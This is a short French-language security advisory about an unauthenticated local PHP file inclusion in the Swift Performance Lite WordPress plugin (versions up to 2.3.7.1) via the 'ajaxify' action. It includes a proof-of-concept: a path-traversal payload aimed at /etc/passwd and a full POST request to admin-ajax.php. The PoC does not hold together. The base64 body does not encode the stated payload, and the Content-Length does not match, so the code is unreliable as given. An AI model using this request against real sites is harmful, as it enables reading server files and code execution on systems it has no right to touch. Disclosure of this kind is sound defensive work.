
Swift Performance Lite <= 2.3.7.1 - Inclusion de fichier PHP locale non authentifiée via 'ajaxify'
Swift Performance Lite <= 2.3.7.1 - Inclusion locale de fichier PHP non authentifiée via 'ajaxify'
Le plugin Swift Performance Lite pour WordPress est vulnérable à une inclusion locale de fichier PHP dans toutes les versions jusqu'à la 2.3.7.1 incluse via la fonction 'ajaxify'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles ou réaliser une exécution de code dans les cas où des images et d'autres types de fichiers "sûrs" peuvent être téléchargés et inclus.
Base64 Payload = ["template-part","null","../../../../../etc/passwd"]
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 202
action=swift_performance_ajaxify&data=WyJ0ZW1wbGFzc3dkIl0=